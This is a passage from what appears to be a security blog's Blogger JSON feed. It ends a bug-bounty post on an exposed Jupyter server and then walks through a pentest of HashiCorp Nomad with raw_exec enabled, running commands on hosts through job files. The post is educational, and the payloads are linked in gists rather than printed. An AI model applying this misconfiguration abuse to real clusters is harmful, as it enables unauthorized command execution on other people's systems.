border=\"0\" data-original-height=\"728\" data-original-width=\"1230\" height=\"189\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEju2aPLTBgI0XIX99e7qOoJb3ffho76zC3SLWYwT1KAOb3M0x6pjovZOnB-q18ZbIxL6mBo57QTOkEgZ9DzqpKjL8YIa6gZwOZdmRWQd7HZQ4eNLhQbw2fAo4CujLzWgyhysSHiBJybsGQ\/s320\/Screen+Shot+2020-03-13+at+10.23.57+PM.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\n\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003EI love payments tables\u003C\/td\u003E\u003C\/tr\u003E\n\u003C\/tbody\u003E\u003C\/table\u003E\n\u003Cbr \/\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\nAlong the way I searched who this company was.\u0026nbsp;\u0026nbsp;\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia\"\u003Ehttps:\/\/en.wikipedia.org\/wiki\/Tokopedia\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nMost interestingly...\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003EIn 2017, Tokopedia received $1.1 billion investment from Chinese e-commerce giant Alibaba.\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-7\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-7\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[7]\u003C\/a\u003E\u003C\/sup\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Again in 2018, the company secured $1.1 billion funding round led by Chinese e-commerce giant\u0026nbsp;\u003C\/span\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Alibaba_Group\" style=\"background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;\" title=\"Alibaba Group\"\u003EAlibaba Group\u003C\/a\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Holding and Japan's\u0026nbsp;\u003C\/span\u003E\u003Ca class=\"mw-redirect\" href=\"https:\/\/en.wikipedia.org\/wiki\/SoftBank\" style=\"background: none rgb(255, 255, 255); color: #0b0080; font-family: sans-serif; text-decoration-line: none;\" title=\"SoftBank\"\u003ESoftBank\u003C\/a\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;Group\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-8\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-8\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[8]\u003C\/a\u003E\u003C\/sup\u003E\u003Cspan style=\"background-color: white; color: #222222; font-family: sans-serif;\"\u003E\u0026nbsp;putting its valuation to about $7B.\u003C\/span\u003E\u003Csup class=\"reference\" id=\"cite_ref-9\" style=\"background-color: white; color: #222222; font-family: sans-serif; line-height: 1; unicode-bidi: isolate; white-space: nowrap;\"\u003E\u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Tokopedia#cite_note-9\" style=\"background: none; color: #0b0080; text-decoration-line: none;\"\u003E[9]\u003C\/a\u003E\u003C\/sup\u003E\u003C\/blockquote\u003E\nSo being a good person (tm) I reported the issue and it was assigned a critical severity. The fixed it super quickly and the team was decently responsive until it was fixed. After that it took 2 weeks to get information on the bounty, I promptly provided payment info, but I was never paid and they have stopped responding to my inquiries.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cb\u003ESolutions:\u003C\/b\u003E\u003Cbr \/\u003E\nRun in a limited privilege container (doesn't protect against cloud metadata attack)\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nNew versions of Juypter notebook allow for password protecting access. Do that instead of open to all"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2552988186359746960\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/2552988186359746960","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2552988186359746960"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2552988186359746960"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2020\/03\/what-is-your-gcp-infra-worthabout-700.html","title":"What is your GCP infra worth?...about ~$700 [Bugbounty]"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDOjBydLfdzwyMoLUkuXGk9kYocnO52GGjrl4Ma3RdVL9d-QUGPkXraLxxg_-TO4-_VrUg81QGsFyl2BG3frj31En1mZjhNSWeOMemoxCqX5tbVBMOGDH6u_NwzRUgJM9D8PA4SNnW5P0\/s72-c\/notebooks-main-page.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-1555777666843031796"},"published":{"$t":"2019-12-16T11:43:00.000-05:00"},"updated":{"$t":"2019-12-16T12:45:22.538-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Devoops: Nomad with raw_exec enabled"},"content":{"type":"html","$t":"\"Nomad is a flexible container orchestration tool that enables an organization to \neasily deploy and manage any containerized or legacy application using a single, \nunified workflow. Nomad can run a diverse workload of Docker, non-containerized, \nmicroservice, and batch applications, and generally offers the following benefits \nto developers and operators...\"\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nfrom:\u0026nbsp;\u003Ca href=\"https:\/\/www.nomadproject.io\/intro\/index.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/intro\/index.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nTo get a feel for where it fits in the HashiCorp ecosphere take a look at the following graphic:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY\/s1600\/Screen+Shot+2018-12-18+at+10.57.58+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"534\" data-original-width=\"1600\" height=\"132\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY\/s400\/Screen+Shot+2018-12-18+at+10.57.58+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\nI'd like to thank \u003Ca href=\"https:\/\/twitter.com\/willbtlr\" target=\"_blank\"\u003EWill Butler\u003C\/a\u003E for letting me write this up after watching him pwn it.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nYou can get a dev environment up and running using the tutorial here:\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.nomadproject.io\/intro\/getting-started\/install.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/intro\/getting-started\/install.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nThe walkthru has you run it as a dev environment which wont bind to 0.0.0.0 so you'll need the following server and client files to get an appropriate environment up and running after you Vagrant up.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nserver:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/ce4296137414bd16fcca0818208b39b7\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/ce4296137414bd16fcca0818208b39b7\u003C\/a\u003E\u003Cbr \/\u003E\nclient1:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/4abde0ee31f4d730019e6fa04ef6d3b6\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/4abde0ee31f4d730019e6fa04ef6d3b6\u003C\/a\u003E\u003Cbr \/\u003E\nclient2:\u0026nbsp;\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/a4399019a943862e57283c29994ce5da\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/a4399019a943862e57283c29994ce5da\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nIf you get everything up and running correctly you should be able to connect to the UI on port 4646 and see the example job\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E$ nomad job run example.nomad\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E==\u0026gt; Monitoring evaluation \"ac9b4b08\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation triggered by job \"example\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation within deployment: \"8a7dfe0f\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EAllocation \"57e65abe\" created: node \"a15034e5\", group \"cache\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E\u003Cspan class=\"Apple-converted-space\"\u003E\u0026nbsp; \u0026nbsp; \u003C\/span\u003EEvaluation status changed: \"pending\" -\u0026gt; \"complete\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cstyle type=\"text\/css\"\u003E\np.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f4f4f4; background-color: #000000}\nspan.s1 {font-variant-ligatures: no-common-ligatures}\n\u003C\/style\u003E\n\n\n\n\n\n\n\n\n\u003Cbr \/\u003E\n\u003Cdiv class=\"p1\"\u003E\n\u003Cspan class=\"s1\"\u003E==\u0026gt; Evaluation \"ac9b4b08\" finished with status \"complete\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY\/s1600\/Screen+Shot+2018-12-18+at+11.10.44+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"494\" data-original-width=\"1600\" height=\"122\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiOElT3HECII9VIWEIfPBE2z5JE8NVOliGSs0fOkuLL4tFbzO8faRYIdW6axFxHcr9iR_m2EJa6gIGq5opsfSkwlTbJ644dHm1AB_Sf4ORUGRB1rSuWALMLV8eYiBPMxV7XbdRJsEUEWfY\/s400\/Screen+Shot+2018-12-18+at+11.10.44+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\njobs in the nomad UI\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4\/s1600\/Screen+Shot+2018-12-18+at+11.11.03+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"481\" data-original-width=\"1600\" height=\"120\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgPGjA_m2RSbEVEWM4yxZ_hXthvuE6hxafRXl6TU-onoRGFttN4jtEWpr1KUSqtjO9BvS9CORcGU6J-CgVxLBC6kGFMv5uJRZ8AUPGXTHuznstpQBSxboh28tzLCulH9O1c6wWRlamIFe4\/s400\/Screen+Shot+2018-12-18+at+11.11.03+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nservers in the nomad UI\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI\/s1600\/Screen+Shot+2018-12-18+at+11.10.56+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"490\" data-original-width=\"1600\" height=\"121\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgMc-N-WTmCYi_Oix_7t5Lg4HME1syM1TdMQyQWQ1Q4AgPT0kZIiaQcbDl6Yylw2ZFGVQAJzcEkC_c5ziktyWKABv16uQIjgXem5SdRQbJGYxsRmoc2R-f4oNpWeCBupWZiU0_Qv2RoLCI\/s400\/Screen+Shot+2018-12-18+at+11.10.56+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nclients in the nomad UI\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cspan style=\"text-align: left;\"\u003ELeveraging misconfiguration time. Nomad ships with a raw_exec option that is disabled by default.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nref: \u003Ca href=\"https:\/\/www.nomadproject.io\/docs\/drivers\/raw_exec.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/docs\/drivers\/raw_exec.html\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nthe raw_exec option allow you to run a command outside isolation on the nomad host.\u0026nbsp;\u0026nbsp;\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\"The \u003Ccode\u003Eraw_exec\u003C\/code\u003E driver can run on all supported operating systems. For security\nreasons, it is disabled by default. To enable raw exec, the Nomad client\nconfiguration must explicitly enable the \u003Ccode\u003Eraw_exec\u003C\/code\u003E driver in the client's\n\u003Ca href=\"https:\/\/www.nomadproject.io\/docs\/configuration\/client.html#options\" target=\"_blank\"\u003Eoptions\u003C\/a\u003E:\"\u003C\/div\u003E\n\u003Cbr \/\u003E\nHow can you see if the raw_exec module is enabled on the clients?\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nYou can check it out it the UI:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY\/s1600\/Screen+Shot+2018-12-18+at+11.16.07+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"940\" data-original-width=\"1600\" height=\"233\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjsZ8YIeTGgA4cZsvq_f_u4YB3bS4comJYJWlwN7v-ZzEeY6jjQLVePRo66fIEGD2wdwodrtooFzb1zD7A4fMFn2-Qya-jXkqHtLIpvN29TjsroA2b0znj7eWJez7CGN5k3OZ8kEVXGqxY\/s400\/Screen+Shot+2018-12-18+at+11.16.07+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nor by hitting the API endpoint\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8\/s1600\/Screen+Shot+2018-12-18+at+11.19.58+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"730\" data-original-width=\"1600\" height=\"181\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhoGOt8gFdkDovoE9iR2PRZqOX8HZFz8NF8GDV9T-w0czFmxZ1BUGViZkoaqFqw1k_0U3bhELzSAppnqR2koKq4IG8uDh-JmZhE2REfG7nHxNgheHMng20K71CRcuwm2rygi9S-X2X0xn8\/s400\/Screen+Shot+2018-12-18+at+11.19.58+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nLet's exploit this thing.\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nWe need to create a job hcl file with our commands. Here is gist with a simple one:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/25b391126dadefe0a9523fb421bf8f33\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/25b391126dadefe0a9523fb421bf8f33\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo\/s1600\/Screen+Shot+2018-12-18+at+11.23.36+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"240\" data-original-width=\"1600\" height=\"94\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgfMwq4-SuLGELxk5L_opJUNlVV5G66uTKsB6Lk29PXazpqWqNI5aqWgPBuBhpzFCFWvxQ61nNxYwrI3YY-pp1RPkxzbdU6g-G_UsJwN69kywvIr8IUNt7XLxCluzUfNIzWvRWTcodzWCo\/s640\/Screen+Shot+2018-12-18+at+11.23.36+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nstarting the service\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4\/s1600\/Screen+Shot+2018-12-18+at+11.23.56+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"178\" data-original-width=\"1426\" height=\"78\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrbWRhrEX7c-WdoLdbJ9e3LZofyYDrn4QOCLlttNSZLG_WVsCx3BDv-xU_K9WXG0Ac5N46MH57ik45kHlLFLvZ3kGPeggEzuu3Dx3U45r7tFBlVyexbRMvMekoSdh8sZ-FCN7qu9o_eQ4\/s640\/Screen+Shot+2018-12-18+at+11.23.56+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nResults of our job\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok\/s1600\/Screen+Shot+2018-12-18+at+11.26.22+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"348\" data-original-width=\"1600\" height=\"86\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi-p7jHQ0RwgfdKGlrR8V6EmUmSolkfktMbqhzyhez76pBvlyTbW1SW7Dlk5C4X2-HEhv5IOFsMPKJmRtLPN2bOCSMUrYl2KVmbcTu7wOWJfguwwyIw6qoxZ4dxPDxURQVOp6AXCV-APok\/s400\/Screen+Shot+2018-12-18+at+11.26.22+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\njob in the UI\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg\/s1600\/Screen+Shot+2018-12-18+at+11.27.17+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"167\" data-original-width=\"1600\" height=\"66\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjpwKuu3OKdc7JsBY_6-Tyepo-MwCH49LpHKoWn8aHcRx3Pu5Ld6tOlZaX5Df4MZMyNqZ2rvU5O4iMeIJuy4eKgoB1XSW7XAXY5FPktwtvdxlqknXXgmPRqutQEXG05PE49G854mbD3jDg\/s640\/Screen+Shot+2018-12-18+at+11.27.17+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nStopping the job\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ\/s1600\/Screen+Shot+2018-12-18+at+11.24.30+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"517\" data-original-width=\"1600\" height=\"128\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgGcpIVEPCahotTk1ZYDNLcPI1gxdOD2jjrjTD9qSd_4bGE4Z29llePq3R0qj_VfAdixes_4NrHNIktGdBqLzEr7SRrPudfMT02usJ4DMltSbMdwu5fa3OWHMcd16Y6_eBE0GIU7NN5lxQ\/s400\/Screen+Shot+2018-12-18+at+11.24.30+AM.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs\/s1600\/Screen+Shot+2018-12-18+at+11.31.58+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 